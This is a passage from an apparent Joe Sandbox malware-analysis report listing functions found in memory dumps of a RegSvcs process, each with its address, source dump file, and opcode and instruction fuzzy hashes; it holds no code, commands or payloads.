                                                Function 06B4F638 Relevance: .2, Instructions: 163COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c05ff2641bf4d0af07b4265b8e7d917d1bce8cf4e4b7da79a84afec79fa77374
                                                • Instruction ID: 35358affc2b6685fbdbb5ecd6be680c772f1826d3f9638fa19d9a3337650b5b4
                                                • Opcode Fuzzy Hash: c05ff2641bf4d0af07b4265b8e7d917d1bce8cf4e4b7da79a84afec79fa77374
                                                • Instruction Fuzzy Hash: 7A51F6B0B202049FFF607AA9D85473F366EE7C9740F200429E10AC7794DA7DCC419392
                                                Function 06B4505A Relevance: .1, Instructions: 136COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6f7c84e707d2940e72834745ef82c4d5690928b482a81299f66950c29cee9e28
                                                • Instruction ID: 57eb7414f2ec38a81d038e7c159f23609bed8cef8715fabf3ddc576e7700ff04
                                                • Opcode Fuzzy Hash: 6f7c84e707d2940e72834745ef82c4d5690928b482a81299f66950c29cee9e28
                                                • Instruction Fuzzy Hash: 0241AC72E00A199FDF70DFA9C880AAFFBF6FB44210F10496AE155D7200D331A8459B91
                                                Function 06B4DABD Relevance: .1, Instructions: 127COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 484c04aaf01665550f3ad9d0d43b16cd933ec5e7c4846f99701b7cbbe58de7c4
                                                • Instruction ID: ba1e1f9c906718930463d115236ce80aeeb551ca375a8145002c1ce35418a10c
                                                • Opcode Fuzzy Hash: 484c04aaf01665550f3ad9d0d43b16cd933ec5e7c4846f99701b7cbbe58de7c4
                                                • Instruction Fuzzy Hash: 3041D070E003099FDB65EFA5D494AAEBBB2FF85340F104569E406EB340EB70D946DB92
                                                Function 06B42200 Relevance: .1, Instructions: 105COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d2bf5fd4ca4d7e0eef215723e34974f7b8ed54404a835bcdc156dd95283ef557
                                                • Instruction ID: fa0fbebc54c4f8f555c76f52622a8837a70a2a0702991e596aeea45e5711128d
                                                • Opcode Fuzzy Hash: d2bf5fd4ca4d7e0eef215723e34974f7b8ed54404a835bcdc156dd95283ef557
                                                • Instruction Fuzzy Hash: EA31C170B102098FDB69AB74D41476E7BE3FB89210F2045A8E402DB399EF35CE45EB95
                                                Function 06B421FB Relevance: .1, Instructions: 102COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ca45bca6f2b4d9e84956bdefb64a5947efa40bb6ad5f5af09ffaf57fc3ca89c5
                                                • Instruction ID: 0e30142fa25336d58e2fc19fb479c5da54fdb50e5667215300c5f62d0682244f
                                                • Opcode Fuzzy Hash: ca45bca6f2b4d9e84956bdefb64a5947efa40bb6ad5f5af09ffaf57fc3ca89c5
                                                • Instruction Fuzzy Hash: 2D31EF70B102058FDB69AB34D45866F7BA3FB89210F1085ACE402DB389DF30CE45EB95
                                                Function 06B4D970 Relevance: .1, Instructions: 98COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2c2dafb89a0117806c227804388b7405c1d3a3003fb74a28490136382db5f556
                                                • Instruction ID: 211d02d1f1a955c2589979f18c64e78ada8108a2ae8acc1c07635f83940d191f
                                                • Opcode Fuzzy Hash: 2c2dafb89a0117806c227804388b7405c1d3a3003fb74a28490136382db5f556
                                                • Instruction Fuzzy Hash: A831C470E1030A9FDB15EF64C880A9EBBB6FF85300F108A69D401EB314EBB1E9468B41
                                                Function 06B420B3 Relevance: .1, Instructions: 93COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2443f22c64f631cd57c8f8def74d5903c3cea8704011c2c4f8f6dc341649e8d2
                                                • Instruction ID: 27e63c27eb6629d233d930d848fad4de29ac75b91143974eaa184fafefafac69
                                                • Opcode Fuzzy Hash: 2443f22c64f631cd57c8f8def74d5903c3cea8704011c2c4f8f6dc341649e8d2
                                                • Instruction Fuzzy Hash: AD31C070E102159FCB19EF64D854AAEBBF2FF89300F10855AE906EB350EB31AD42DB40
                                                Function 06B420C0 Relevance: .1, Instructions: 91COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 18f8ff0bb127e9e95968a6b0d3f5631092c201134cd5194a03b0e3bb29a4df40
                                                • Instruction ID: 310044b8c686ed6370371226291d440c5268e1385eeaafdc528c47fdc927af49
                                                • Opcode Fuzzy Hash: 18f8ff0bb127e9e95968a6b0d3f5631092c201134cd5194a03b0e3bb29a4df40
                                                • Instruction Fuzzy Hash: 9631B070E102199FCB19EFA4D854A9EBBF2FF88300F108559E916EB350EB71AD46CB50
                                                Function 06B43AE8 Relevance: .1, Instructions: 79COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8cd13a1755eaeb080641f31f274179dcd4168fced7760e18b904aa7db969570a
                                                • Instruction ID: cbb09eed477aec7eb5da770231520f5989c144d7f3e2de59c046ef40879eac25
                                                • Opcode Fuzzy Hash: 8cd13a1755eaeb080641f31f274179dcd4168fced7760e18b904aa7db969570a
                                                • Instruction Fuzzy Hash: 69217C75F006199FDF10EFAAD850BAEBBF6BB48350F184169E945E7384E635D8018B90
                                                Function 06B43AF8 Relevance: .1, Instructions: 78COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cbba3f130c1abcb24fd159e171936e50829c16f6de90b12e938ce0d8612b63ef
                                                • Instruction ID: 88901c3637111d0469d289692556f97c4ed7a40e3322ba8b42a90ed26dd48705
                                                • Opcode Fuzzy Hash: cbba3f130c1abcb24fd159e171936e50829c16f6de90b12e938ce0d8612b63ef
                                                • Instruction Fuzzy Hash: A8215AB5F006199FDB40EF6AD980BAEBBF5FB48350F144169E905E7380E635D9418B90
                                                Function 0122D030 Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3852493411.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_122d000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: aee29ccca95a1de5be72e2c713f0700baf819eeb7b2421bfbcecb63abb09e8b9
                                                • Instruction ID: 11a587c2e716783914f6ff2202008b2318b11ccec206c41f288a84040ab30120
                                                • Opcode Fuzzy Hash: aee29ccca95a1de5be72e2c713f0700baf819eeb7b2421bfbcecb63abb09e8b9
                                                • Instruction Fuzzy Hash: 68212271524308EFDB15DF94D9C0F2ABBA1FB88314F20C56DE9094B262C37AD947CA62
                                                Function 06B43E40 Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 35275f893431b00af0edacb381db326597eaba8baeb60af24a0b8dd26839d737
                                                • Instruction ID: dc8e955128b64c671bdf808a33bb098e9e6c2b53052b373962d70eca6ee6d938
                                                • Opcode Fuzzy Hash: 35275f893431b00af0edacb381db326597eaba8baeb60af24a0b8dd26839d737
                                                • Instruction Fuzzy Hash: 1201F531B211101FDB65E66D9850B6BB7DBDBC9711F18846AF50EC7391EA21CC0243A2
                                                Function 06B43C08 Relevance: .1, Instructions: 59COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cd2ae445c79d35fb4abd33465e541eac7acba6d100aa08a027a11b52fb6857bc
                                                • Instruction ID: 5ad4832b30ea847acdb35b52a34e7e8f404160a6d015df2c1adf9b3e6c9e6298
                                                • Opcode Fuzzy Hash: cd2ae445c79d35fb4abd33465e541eac7acba6d100aa08a027a11b52fb6857bc
                                                • Instruction Fuzzy Hash: 7B11CE72F005288FCF64A67AE8246AE77EBFBC8310B044579C406E7344EA25CC028BD1
                                                Function 06B49F00 Relevance: .1, Instructions: 58COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 99d52f663bfbbf7e925d6790318752fb1eaac9360be2aafc2fe9b449f7462120
                                                • Instruction ID: 5e40a58e345bdb4d008d9877b89e564b14f85996f86cf1fa1a84209dd6182594
                                                • Opcode Fuzzy Hash: 99d52f663bfbbf7e925d6790318752fb1eaac9360be2aafc2fe9b449f7462120
                                                • Instruction Fuzzy Hash: 6A112870B122141FCB61F678D814BAB7BEAEB89711F1085A9F00BCB351DA24ED0283D1
                                                Function 06B4C529 Relevance: .1, Instructions: 57COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6dfbdde0ebfaa54f0247c753be1ae09b277e080723a14178e8d6b5acb6d4d0e4
                                                • Instruction ID: 1e83215a0ff83762fd65ad2568fa5d2307d1677e7b72e05583a5eabfd6af89f5
                                                • Opcode Fuzzy Hash: 6dfbdde0ebfaa54f0247c753be1ae09b277e080723a14178e8d6b5acb6d4d0e4
                                                • Instruction Fuzzy Hash: E901B176F210144FCF61B678E8517AF6AA7E7C8361F115576D50AD7340EB31CC128790
                                                Function 06B4ED91 Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a253e0b4f7310dff5ab922eb59d50504cf8921c344e6adcf9cebe4ddda129444
                                                • Instruction ID: 58cd92cb4899e82dc8aa432a5426e79ff49603405444fdc334459b031cb172cb
                                                • Opcode Fuzzy Hash: a253e0b4f7310dff5ab922eb59d50504cf8921c344e6adcf9cebe4ddda129444
                                                • Instruction Fuzzy Hash: BB01DF31B105101BDB65A63C9890B6F7ADBFBCA210F1084A9F10BC7381EF21DC0343A2
                                                Function 06B43BF7 Relevance: .1, Instructions: 55COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a953171ab0ca5c754e51e2c8bc3f0ff3203b6873b8147c8547ca25c4adff683f
                                                • Instruction ID: 3672c79c83d99ce8bf26ec12549f74593e767b8497f46f6f792549908f8000b0
                                                • Opcode Fuzzy Hash: a953171ab0ca5c754e51e2c8bc3f0ff3203b6873b8147c8547ca25c4adff683f
                                                • Instruction Fuzzy Hash: D101DE32F102285BDBA4A67EAC246EBB6EBEBC8310F040135D506D3345EA24880247D1
                                                Function 06B438C0 Relevance: .1, Instructions: 54COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6afd95db0c57ac4d8e56505bd41026d50b8e7f31bb0a7570231f35d18e7ac8aa
                                                • Instruction ID: 8a34e9861d79eed8442cc750131c3d0f6b88f2dfc137832ab5fe596f77e1d467
                                                • Opcode Fuzzy Hash: 6afd95db0c57ac4d8e56505bd41026d50b8e7f31bb0a7570231f35d18e7ac8aa
                                                • Instruction Fuzzy Hash: 1C2103B5D00219AFCB10DF9AD884ADEFBF8FB48314F10812AE918A7201C3796954CFA5
                                                Function 0122D02B Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3852493411.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_122d000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5930c3722e95abe2067eb95ddfb8aa1848112c8b53b048d5b6b565b5491e75cf
                                                • Instruction ID: f1b7dee9a9cc68510be7db8d3c7499e18b6ef6d190a26f6f0340c18bbd3f6953
                                                • Opcode Fuzzy Hash: 5930c3722e95abe2067eb95ddfb8aa1848112c8b53b048d5b6b565b5491e75cf
                                                • Instruction Fuzzy Hash: 7111BB75504284DFCB16CF54D5C0B19BFA1FB88314F28C6AAD9494B666C33AD84ACB62
                                                Function 06B438C8 Relevance: .1, Instructions: 52COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2428fef8217f6a050d14f43e7f4722a22ea2abba1dee93032e97bf0c79266f34
                                                • Instruction ID: c0f32eb1eecd94749e2c60cafec41c54f6bc5bf37a3421e6638ad3059665d7ef
                                                • Opcode Fuzzy Hash: 2428fef8217f6a050d14f43e7f4722a22ea2abba1dee93032e97bf0c79266f34
                                                • Instruction Fuzzy Hash: 5411D0B5D01259AFCB10DF9AD884ADEFBF4FB48310F10812AE918A7200C379A944CFA5
                                                Function 06B43E50 Relevance: .1, Instructions: 51COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d5de64f0b6d3a42a7a02a6b4a2b70b1978e2a6246b627f054c7c7e936959555c
                                                • Instruction ID: 36e7e2873c0562f725040e4c745d5a3082fa0a70a8c7e718eb0061995a8d0778
                                                • Opcode Fuzzy Hash: d5de64f0b6d3a42a7a02a6b4a2b70b1978e2a6246b627f054c7c7e936959555c
                                                • Instruction Fuzzy Hash: 5801D131B200110BDB64A56E9490B2BB2DBDBC9720F28843AE50FC7344EE61DC0243A1
                                                Function 06B4EDA0 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 50424381cb934810541d3a219305b986a45ba487266f5efaeb083d727cb9c568
                                                • Instruction ID: 87d535c86cb2e4c9b4bac85619d8cf1b8630b834556fc2d6c4cd90db6d733c85
                                                • Opcode Fuzzy Hash: 50424381cb934810541d3a219305b986a45ba487266f5efaeb083d727cb9c568
                                                • Instruction Fuzzy Hash: EB01AF31B104105BDBA5A63C9890B2F76EBFBC9620F209879E10BC7340EE25DD035391
                                                Function 06B49F10 Relevance: .0, Instructions: 46COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4599d4e2f800aa8bf153c7c7d6ed440e2f19887ca81efa9648dc9dcb230651f1
                                                • Instruction ID: c21326dd46a86ce269db70494a4a5a80eee1a33adba33188344e9dead9df862c
                                                • Opcode Fuzzy Hash: 4599d4e2f800aa8bf153c7c7d6ed440e2f19887ca81efa9648dc9dcb230651f1
                                                • Instruction Fuzzy Hash: 97018C70B104144FDB61FA6CD854B6B73EAEBC9721F109968F50BCB354EA21EC028781
                                                Function 06B46070 Relevance: .0, Instructions: 26COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.3860542996.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_6b40000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ca927a8833fd215a0a76f9c21abfa7b8ebf18bfc6162daa34f0aeba04249e6e7
                                                • Instruction ID: c76e814ef3ac279bfec6c83aaddaf6a95ffd1f2857ed1f9acc84f4fcef20619e
                                                • Opcode Fuzzy Hash: ca927a8833fd215a0a76f9c21abfa7b8ebf18bfc6162daa34f0aeba04249e6e7
                                                • Instruction Fuzzy Hash: 68E012B19206089BDF20EE65898976BB3EDE706308F5048A5D949C7201F633EA515780